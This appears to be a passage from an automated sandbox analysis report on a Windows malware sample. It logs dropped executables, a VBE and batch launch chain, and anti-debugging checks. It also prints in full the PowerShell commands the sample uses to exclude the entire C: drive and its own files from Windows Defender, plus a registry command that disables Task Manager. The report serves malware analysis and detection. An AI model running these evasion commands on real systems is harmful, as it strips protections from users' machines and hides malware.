                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0027A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0027A69B
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0028C220
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028E6A3 VirtualQuery,GetSystemInfo,0_2_0028E6A3
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 30000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 599872
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 599593
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 3600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 598828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 598437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 597781
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 597203
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596843
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596609
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596073
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595850
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595531
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594672
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594312
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 593656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 593156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592859
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 591484
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 591160
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590937
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590562
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 589828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 589000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 588656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 300000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 588343
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587859
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587577
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587297
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586234
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585487
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585359
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585247
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585047
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584904
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584750
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584464
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584358
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584248
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584138
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 583906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 583774
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: ComrefNetsvc.exe, 00000008.00000002.2149675445.000000001AF9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: w32tm.exe, 00000030.00000002.2149119622.000002FA756F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeAPI call chain: ExitProcess graph end nodegraph_0-23874
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0028F838
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00297DEE mov eax, dword ptr fs:[00000030h]0_2_00297DEE
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0029C030 GetProcessHeap,0_2_0029C030
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0028F838
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028F9D5 SetUnhandledExceptionFilter,0_2_0028F9D5
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0028FBCA
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00298EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00298EBD
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
